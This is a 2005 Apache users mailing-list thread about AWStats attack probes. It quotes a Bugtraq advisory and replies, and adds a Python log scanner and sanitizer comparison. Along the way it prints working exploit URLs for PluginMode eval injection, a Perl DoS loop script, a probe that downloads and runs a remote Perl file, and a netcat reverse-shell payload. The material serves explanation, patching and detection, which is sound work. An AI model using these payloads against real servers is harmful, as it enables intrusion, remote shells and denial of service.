My apache logs show row after row of the following, all from various IP addresses. This started a couple of days ago. I don't have awstats. Could somebody tell me what that is? Is there anything I should be doing? thanks.

K.

GET //awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20http://www.geocities.com/kidk1d/a.pl;perl%20a.pl;echo%20;rm%20-rf%20a.pl*;echo| HTTP/1.1

---------------------------------------------------------------------
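What that request is: the configdir value is wrapped in '|', which makes the Perl script open it as a shell command line instead of a directory name, so everything between the pipes (cd /tmp, fetch a.pl, run it, delete it) is executed by the web server user if awstats.pl answers at that path. Below is an added example, written for this page rather than taken from the question, the replies or the AWStats project: a small Python scanner that pulls the awstats probes out of an Apache access log, decodes the payload, extracts the commands and the download URL, and separates harmless probes (404, no script there) from hits that need follow-up. The sample log lines are constructed (RFC 5737 addresses; request strings modelled on the ones quoted in this thread), and the rule names and function names are my own.

```python
import re
import sys
from urllib.parse import unquote_plus

# Constructed sample (Apache combined log format). Request strings are modelled on
# the ones quoted in this thread; the client addresses are RFC 5737 test ranges.
SAMPLE_LOG = """\
203.0.113.7 - - [14/Feb/2005:02:11:09 -0500] "GET //awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20http://www.geocities.com/kidk1d/a.pl;perl%20a.pl;echo%20;rm%20-rf%20a.pl*;echo| HTTP/1.1" 404 285 "-" "Mozilla/4.0"
198.51.100.3 - - [03/Feb/2005:12:28:28 -0500] "GET //cgi-bin/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
198.51.100.3 - - [15/Feb/2005:09:00:01 -0500] "GET /cgi-bin/awstats.pl?config=example&PluginMode=:print+system('id')+; HTTP/1.1" 200 1324 "-" "curl/7.10"
198.51.100.3 - - [15/Feb/2005:09:00:02 -0500] "GET /cgi-bin/awstats.pl?config=example&loadplugin=../../../../usr/libdata/perl/5.00503/blib HTTP/1.1" 500 606 "-" "curl/7.10"
192.0.2.9 - - [15/Feb/2005:09:05:00 -0500] "GET /cgi-bin/awstats.pl?config=example&output=main HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
"""

# Common/combined log format: client ident user [timestamp] "METHOD target [HTTP/x]" status ...
CLF = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?" (?P<status>\d{3})'
)
URL_RE = re.compile(r"""https?://[^\s;|'"]+""")


def parse_query(target):
    """Split a request target into path and {lower-cased name: [decoded values]}.
    Splitting only on '&' (never ';') matters here: the shell payload uses ';'."""
    path, _, qs = target.partition("?")
    params = {}
    for part in qs.split("&"):
        if not part:
            continue
        name, _, value = part.partition("=")
        params.setdefault(unquote_plus(name).lower(), []).append(unquote_plus(value))
    return path, params


def analyse_request(target):
    """Return [(rule, detail)] for one request target; empty if nothing awstats-specific."""
    path, params = parse_query(target)
    findings = []
    if not path.lower().endswith("awstats.pl"):
        return findings
    for value in params.get("configdir", []):
        # A value wrapped in '|' is the pipe-open trick: the text between the pipes is
        # handed to the shell. Pull out the individual commands and any download URL.
        if "|" in value:
            body = value.strip("|")
            commands = [c.strip() for c in body.split(";") if c.strip()]
            findings.append(("configdir-pipe", {"commands": commands, "urls": URL_RE.findall(body)}))
    for value in params.get("pluginmode", []):
        if value.lstrip().startswith(":"):
            # leading ':' is the eval() trick from the advisory's item [1]
            findings.append(("pluginmode-eval", {"payload": value}))
        elif value.lower() == "rawlog":
            findings.append(("rawlog-plugin", {"payload": value}))
    for value in params.get("loadplugin", []):
        if ".." in value or "/" in value:
            findings.append(("loadplugin-traversal", {"payload": value}))
    return findings


def scan(log_text):
    """Run analyse_request over every parseable line; one dict per finding."""
    results = []
    for line in log_text.splitlines():
        m = CLF.match(line)
        if not m:
            continue
        for rule, detail in analyse_request(m["target"]):
            results.append({"ip": m["ip"], "ts": m["ts"], "status": m["status"], "rule": rule, **detail})
    return results


def needs_followup(finding):
    """A 404 means no awstats.pl answered at that path. Anything else (a 200, or the
    500 one poster saw when command output landed in the headers) means the script
    ran: check the process list, /tmp and any web-writable directory on that host."""
    return finding["status"] != "404"


if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_LOG
    for f in scan(text):
        flag = "INVESTIGATE" if needs_followup(f) else "probe-only "
        print(flag, f["ip"], f["status"], f["rule"], f.get("commands") or f.get("payload"))
```

Run it as `python3 awstats_probes.py /var/log/apache/access_log` (the file name is mine). With no awstats installed, every hit should be a 404 and "probe-only"; the URL in the configdir payload is still worth blocking at the proxy or noting for the abuse report. A 200 or 500 on a configdir or PluginMode request is the case to treat as a compromise until proven otherwise.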
Konstantine, provided you don't have one of the vulnerable versions of awstats installed, just give a prayer of thanks. If you have a version covered by the following mail, try to disable or upgrade:
At 8:10 +0000 14/2/2005, GHC@xxxxxxxxxxxxxxxxxxxxx wrote:

Date: 14 Feb 2005 08:10:40 -0000
From: GHC@xxxxxxxxxxxxxxxxxxxxx <foster@xxxxxx>
To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: AWStats <= 6.4 Multiple vulnerabilities

/*==========================================*/
//  GHC -> AWStats <- ADVISORY
//  PRODUCT: AWStats
//  VERSION: <= 6.3
//  URL: http://awstats.sourceforge.net/
//  VULNERABILITY CLASS: Multiple vulnerabilities
//  RISK: high
/*==========================================*/

[Product Description]

"AWStats is a free powerful tool that generates advanced web, ftp or mail server statistics, graphically. This log analyzer works as a CGI or from command line and shows you all possible information your log contains, in few graphical web pages."

Current stable version: AWStats 6.3 final
Development version is 6.4 - 2005-02-06 14:31

[Summary]

Successful exploitation of an input validation vulnerability in AWStats scripts allows attackers to execute limited perl directives under the privileges of the web server and get sensitive information. Some actions of the attacker can lead to denial of service.

[Details]

Some AWStats functions can be extended with plugins. Two variables (loadplugin & pluginmode) deal with it. The first one (loadplugin) is responsible for the plugins list (plugin1, plugin2); the second one runs a plugin's functions.
Exploitable example (raw log plugin):

http://server/cgi-bin/awstats-6.4/awstats.pl?pluginmode=rawlog&loadplugin=rawlog

Server answer:

192.*.*.* - - [26/Jan/2005:11:01:41 +0300] "GET /cgi-bin/index.cgi HTTP/1.1" 500 606
192.*.*.* - - [26/Jan/2005:11:03:54 +0300] "GET /cgi-bin/index.cgi HTTP/1.1" 500 606
192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET /themes/standard/style.css HTTP/1.1" 200 2986
192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET /cgi-bin/index.cgi HTTP/1.1" 200 7710
192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET /themes/standard/images/logo.gif HTTP/1.1" 200 14443
192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET /images/xml.gif HTTP/1.1" 200 429
192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET /images/pb_yawps.gif HTTP/1.1" 200 2532
192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET /themes/standard/images/valid-html401.gif HTTP/1.1" 200 2250
192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET /themes/standard/images/vcss.gif HTTP/1.1" 200 1547
192.*.*.* - - [26/Jan/2005:11:08:06 +0300] "GET /cgi-bin/forum.cgi HTTP/1.1" 200 7333
192.*.*.* - - [26/Jan/2005:11:08:11 +0300] "GET /cgi-bin/links.cgi HTTP/1.1" 200 7588
192.*.*.* - - [26/Jan/2005:11:08:12 +0300] "GET /cgi-bin/top10.cgi HTTP/1.1" 200 7910
192.*.*.* - - [26/Jan/2005:11:08:17 +0300] "GET /cgi-bin/admin.cgi HTTP/1.1" 200 7340
192.*.*.* - - [26/Jan/2005:11:08:33 +0300] "GET /yawpsnews.xml HTTP/1.1" 200 153

The dangerous fact is that an attacker can read sensitive information such as IP addresses, admin script names, non-encoded GET queries, etc.

Our variables pass some verification (as others do), but it is not enough for security:

sub Sanitize {
    my $stringtoclean=shift;
    $stringtoclean =~ s/[^\w_\-\\\/\.:\s]//g;
    return $stringtoclean;
}

Deletes everything but '_', '-', '\', '/', '.', ':' and any blank symbol. It's enough for variables with paths to configuration files, but not for plugin tasks.
In the case of "loadplugin" & "pluginmode" the developers obviously have a lot of trust in the user. So, let's see what can be done, in fact.

[1] Perl code execution.

http://server/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:print+getpwent

We'll get the action in the next piece of code:

# AWStats output is replaced by a plugin output
if ($PluginMode) {
    my $function="BuildFullHTMLOutput_$PluginMode()";
    eval("$function");
    if ($? || $@) { error("$@"); }
    &html_end(0);
    exit 0;
}

If the variable exists, we'll get code execution. This happens after sanitizing (see previous). Here we have the interesting part in:

    my $function="BuildFullHTMLOutput_$PluginMode()";
    eval("$function");

This is a subroutine call (as an example, sub BuildFullHTMLOutput_rawlog() from the rawlog.pm plugin). Ideal case: "module name"::BuildFullHTMLOutput_"function name"(). But if we don't specify the name of the module (with the "loadplugin" parameter) we'll get the next: main::BuildFullHTMLOutput_"function name"().

By the way, the symbol ':' is permitted in user input parameters. So, we can send:

PluginMode=:print+getpwent

And the $function becomes 'BuildFullHTMLOutput_:print getpwent()'. This will satisfy eval() requirements, and :print getpwent() is executed.

http://www.lan.server/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:print+getpwent

Sanitizing limits the user's input, but there is no filtration for call symbols '()'. Here we can see that somebody can perform a DoS attack.
This is an example of simple code for successful DoS exploitation:

#!/usr/bin/perl
use IO::Socket;

$server = 'www.example.com';

sub ConnectServer {
    $socket = IO::Socket::INET->new(
        Proto    => "tcp",
        PeerAddr => "$server",
        PeerPort => "80"
    ) || die "Error\n";
    # PluginMode=:sleep becomes a bare sleep() inside eval(), which never
    # returns, so every request ties up a server process. $rp only makes
    # each URL unique.
    print $socket "GET /cgi-bin/awstats-6.4/awstats.pl?&hack=$rp&PluginMode=:sleep HTTP/1.1\n";
    print $socket "Host: $server\n";
    print $socket "Accept: */*\n";
    print $socket "\n\n";
}

while () {
    $rp = rand;
    &ConnectServer;
}

[BUGFIX]

Change the vulnerable code for:

sub PluginSanitize {
    my $stringtoclean=shift;
    $stringtoclean =~ s/[^\w]//g;
    return $stringtoclean;
}

[2] Arbitrary plugin including.

http://server/cgi-bin/awstats-6.4/awstats.pl?&loadplugin=../../../../usr/libdata/perl/5.00503/blib

An arbitrary module from the user's input through the "loadplugin" parameter can be included with the "require" function.

Bugfix - as above or something like this:

opendir (PDIR, './plugins');
@FilesPDIR = readdir(PDIR);
closedir (PDIR);
foreach $FilesPName (@FilesPDIR) {
    if ($FilesPName =~ m/$loadplugin/) { }
}

The good thing is the poison null-byte (%00) has no place (it transfers to 00).

[3] Sensitive information leak in AWStats version 6.3 (Stable) - 6.4 (Development).

Every user can access the debug function:

http://server/cgi-bin/awstats-6.4/awstats.pl?debug=1
http://server/cgi-bin/awstats-6.4/awstats.pl?debug=2

[DISCLOSURE TIMELINE]

10-02-2005 Initial vendor notification.
14-02-2005 No response.
14-02-2005 Bug-traq post.

/* ================================================== */
/* www.ghc.ru -- security games & challenges          */
/* ================================================== */
/* greets to: RST.void.ru, cr0n & all quest hunters %)*/
/* Special respect to e-defense.                      */
/* ================================================== */

At 16:24 +0100 15/2/2005, Ondra Holecek wrote:

| PluginMode=:print+getpwent
|
| And the $function becomes 'BuildFullHTMLOutput_:print getpwent()'.
| This will satisfy eval() requirements, and :print getpwent() is executed.
| http://www.lan.server/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:print+getpwent
|
| Sanitizing limits user's input, but there is no filtration for call symbols '()'.

No, the user is not limited, he can execute ANY command if he adds ; at the end of the command, try this

awstats.pl?&PluginMode=:print+system('id')+;

or even this

awstats.pl?&PluginMode=:print+system('nc+172.16.1.2+3000+-e+/bin/sh')+;

At 14:25 -0500 15/2/2005, Jamie Pratt wrote:

So what are the conditions of this bug/vuln? I can't reproduce this on several 6.3 installs..:

awstats 6.3 from source:

request:
http://www.site.org/awstats/cgi-bin/awstats.pl?&PluginMode=:print+system('id')+;

output:
****************
Error: Can't locate object method "BuildFullHTMLOutput_print" via package "systemid" (perhaps you forgot to load "systemid"?) at (eval 1) line 1.
Setup ('/etc/awstats/awstats.www.site.org.conf' file, web server or permissions) may be wrong. Check config file, permissions and AWStats documentation (in 'docs' directory).
***************

At 20:52 +0100 15/2/2005, Ondra Holecek wrote:

It seems this bug works only on my server, I don't know why

/awstats.pl?&PluginMode=:print+system('id')+;

reply:
uid=99(nobody) gid=4294967295 groups=4294967295,98(nobody) 256
Error: Setup ('/usr/local/etc/awstats/awstats.conf' file, web server or permissions) may be wrong. Check config file, permissions and AWStats documentation (in 'docs' directory).

awstats: Advanced Web Statistics 6.1 (build 1.751) (original)
perl: This is perl, v5.8.5 built for i586-linux
os: Linux xxx.tld 2.4.22 #4 Wed Jul 7 21:07:03 CEST 2004 i586 unknown unknown GNU/Linux

At 16:38 -0500 15/2/2005, Herman Sheremetyev wrote:

It works on mine too, though I still have 6.1. I think you may need to add the config=www.example.com into the url between the '?' and the '&' for it to work properly though.
On my linux boxes with apache 2.0 it displays the command output in the page but on openbsd with apache 1.3 it gives a 500 Server Error because the output ends up in the headers somehow. Either way it works though.

At 22:23 +0100 15/2/2005, Ondra Holecek wrote:

I'm sorry I didn't write it, only awstats 6.1 and 6.2 are vulnerable to this bug (system('id'), etc.)

At 12:53 -0800 15/2/2005, William Pratt wrote:

Same thing here on both 6.3 and 6.4. I am unable to reproduce this.

Error: Can't locate object method "BuildFullHTMLOutput_print" via package "systemid" (perhaps you forgot to load "systemid"?) at (eval 1) line 1.
Setup ('/usr/local/apache/root/billpratt_net/cgi-bin/awstats/awstats.conf' file, web server or permissions) may be wrong. Check config file, permissions and AWStats documentation (in 'docs' directory).

William Pratt
Sr. Engineering Application Developer
Megapath Networks, Inc.
Http://www.MegaPath.net

I wish there was a knob on the TV to turn up the intelligence. There's a knob called "brightness", but it doesn't seem to work.

At 17:19 -0500 15/2/2005, Jeffrey Wilkinson wrote:

Nonetheless, each of these causes AWstats to disclose the full path to the AWstats installation, regardless of whether it is *nix or Windows. That alone is enough for concern.

At 14:00 -0700 15/2/2005, twebster@xxxxxxxxxxx wrote:

You may need to specify an awstats config to view, example:

http://www.site.org/awstats/cgi-bin/awstats.pl?config=websitename&PluginMode=:print+system('id')+;

At 16:46 -0500 15/2/2005, Jamie Pratt wrote:

Still no dice on 6.3, even with the "config=www.site.org" etc, etc.. same error. So.. Can we all agree that 6.3 is not vulnerable, because I'd rather not upgrade to a dev/unstable release for no reason...

At 9:47 -0500 16/2/2005, Thom Craver wrote:

I can confirm the bug on 6.3 running Apache 2.0.52. Furthermore, ANY system command inserted in the system() call can be executed. This is a very serious bug.
Unprivileged user or not, with an .rhosts file on a potential attacker's end, scp would work just nicely, then a chmod, then execution of any script they wanted to upload. This issue is not to be taken lightly.

Until this issue is resolved, we have commented out the Plugin lines:

# AWStats output is replaced by a plugin output
if ($PluginMode) {
    my $function="BuildFullHTMLOutput_$PluginMode()";
    eval("$function");
    if ($? || $@) { error("$@"); }
    &html_end(0);
    exit 0;
}

If a plugin is called, it is apparently ignored and the stats are displayed.

--
Thom Craver
Corporate Communications, Inc.
www.corp-com.com

At 7:45 +0000 16/2/2005, K-OTiK Security wrote:

6.4 was released on 2005-02-14 13:13

Fixes:
- Fix security hole that allowed a user to read log file content even when plugin rawlog was not enabled.
- Fix a possible use of AWStats for a DoS attack.
- configdir option was broken on windows servers.
- Minor fixes

Regards
K-OTik Security Research & Monitoring Team 24/7
http://www.k-otik.com/english

At 15:52 -0500 16/2/2005, Micah Brandon wrote:

I'm going to have to disagree. Execution of Perl functions is still possible in 6.3. You just have to jimmy it a little and try/guess different plugins that may be installed. I got a hit with 'hostinfo'. Try this on your server:

http://server/cgi-bin/awstats.pl?config=someconfig&PluginMode=hostinfo+time

Unix time shows up just below the 'Whois command failed' error message. That's game over in my book.

At 20:34 -0500 16/2/2005, Michael Scheidell wrote:

And the skiddies who tried to exploit something that didn't exist on our site: (this goes on for some time, here is just a snip)

So, anyone out there who decided to do a 'wait and see', don't. Disable awstats, use access rules, upgrade it or all three.

217.172.168.109 - - [03/Feb/2005:12:28:28 -0500] "GET //cgi-bin/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible; MSIE 6.
0; Windows 98)"
217.172.168.109 - - [03/Feb/2005:12:28:29 -0500] "GET //cgi-bin/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
64.62.145.98 - - [10/Feb/2005:03:59:02 -0500] "GET //cgi-bin/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
64.62.145.98 - - [10/Feb/2005:03:59:02 -0500] "GET //cgi-bin/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
64.62.145.98 - - [10/Feb/2005:03:59:03 -0500] "GET //cgi/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
64.62.145.98 - - [10/Feb/2005:03:59:03 -0500] "GET //awstatswwwroot/cgi-bin/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
64.62.145.98 - - [10/Feb/2005:03:59:03 -0500] "GET //cgi/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
64.62.145.98 - - [10/Feb/2005:03:59:04 -0500] "GET //cgi-bin/cgi-bin/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
64.62.145.98 - - [10/Feb/2005:03:59:04 -0500] "GET //cgi-bin/ cgi-bin/awstats.pl

At 14:01 -0500 17/2/2005, Matt Wilder wrote:

Awstats version 5.6 is not susceptible to this as it does not have the same plugin architecture. Could this be a >= 6.0 bug?

At 14:46 +0000 18/2/2005, newbug Tseng wrote:

Hi. Please check http://packetstormsecurity.org/0501-exploits/AWStatsVulnAnalysis.pdf, there's some code analysis for awstats.

At 22:26 +0000 3/5/2005, Laurent Destailleur wrote:

> Subject: AWStats <= 6.4 Multiple vulnerabilities

Must read AWStats <= 6.3. Version 6.4 is not affected.
rgds

---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@xxxxxxxxxxxxxxxx
   "   from the digest: users-digest-unsubscribe@xxxxxxxxxxxxxxxx
For additional commands, e-mail: users-help@xxxxxxxxxxxxxxxx
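The thread above argues about which PluginMode payloads work on which version, and the Sanitize() regex quoted in the advisory settles most of it. As an added example (mine, not code from the advisory, the thread or the AWStats project), here are Python renditions of that filter and of the advisory's proposed PluginSanitize(), run over the PluginMode values posted in the thread, to show what reaches eval(). The security point is the leading ':': once it survives the filter, Perl parses 'BuildFullHTMLOutput_:' as a statement label, so the eval string no longer names a subroutine at all and whatever follows the colon is the code that runs. The same filter strips quotes, parentheses and ';', which collapses system('id') to systemid, the very "package systemid" that appears in the 6.3 error messages posted above, while :print getpwent and :sleep pass untouched. Function names, payload labels and the re.ASCII choice (to keep \w and \s to Perl's default ASCII sets) are my own.

```python
import re
from urllib.parse import unquote_plus


def sanitize_63(s):
    r"""AWStats 6.3 Sanitize(): s/[^\w_\-\\\/\.:\s]//g
    Keeps word characters, '_', '-', backslash, '/', '.', ':' and whitespace;
    drops everything else (so quotes, parentheses, ';', '|' all disappear)."""
    return re.sub(r"[^\w_\-\\/.:\s]", "", s, flags=re.ASCII)


def plugin_sanitize(s):
    r"""The advisory's proposed PluginSanitize(): s/[^\w]//g (word characters only)."""
    return re.sub(r"[^\w]", "", s, flags=re.ASCII)


def eval_string(raw_pluginmode, sanitizer):
    """What AWStats hands to eval(): "BuildFullHTMLOutput_$PluginMode()" after the
    query-string value has been URL-decoded and passed through the given filter."""
    return "BuildFullHTMLOutput_%s()" % sanitizer(unquote_plus(raw_pluginmode))


def is_label_injection(raw_pluginmode, sanitizer):
    """True if the filtered value still begins with ':'. Perl then reads
    'BuildFullHTMLOutput_:' as a statement label and executes what follows it, so
    the fixed prefix no longer constrains which code runs."""
    return sanitizer(unquote_plus(raw_pluginmode)).lstrip().startswith(":")


# Payloads quoted in the thread, exactly as they appear in the query string.
PAYLOADS = {
    "getpwent": ":print+getpwent",          # advisory item [1]
    "system":   ":print+system('id')+;",    # Ondra Holecek's variant
    "sleep":    ":sleep",                   # PluginMode used by the DoS script
    "legit":    "rawlog",                   # a real plugin name, for contrast
}


def compare(payloads=PAYLOADS):
    """For each payload: the eval string under both filters and whether the
    label trick survives. Returns {name: {filter: (eval_string, injected)}}."""
    rows = {}
    for name, raw in payloads.items():
        rows[name] = {
            "sanitize_63": (eval_string(raw, sanitize_63), is_label_injection(raw, sanitize_63)),
            "plugin_sanitize": (eval_string(raw, plugin_sanitize), is_label_injection(raw, plugin_sanitize)),
        }
    return rows


if __name__ == "__main__":
    for name, row in compare().items():
        for filt, (code, injected) in row.items():
            print("%-8s %-15s %-5s %s" % (name, filt, injected, code))
```

Running it prints one row per payload and filter. Under sanitize_63 the getpwent and sleep payloads keep their colon (injected = True) while the system('id') payload degrades to ':print systemid', which explains both the 6.1/6.2 versus 6.3 split reported in the thread and why the DoS fix was still needed. Under plugin_sanitize every value collapses to a bare word, so the eval string is always a single (possibly undefined) subroutine name, which eval() reports as an error rather than executing. If you are checking your own installation, diff the Sanitize regex in your awstats.pl against the one reproduced here.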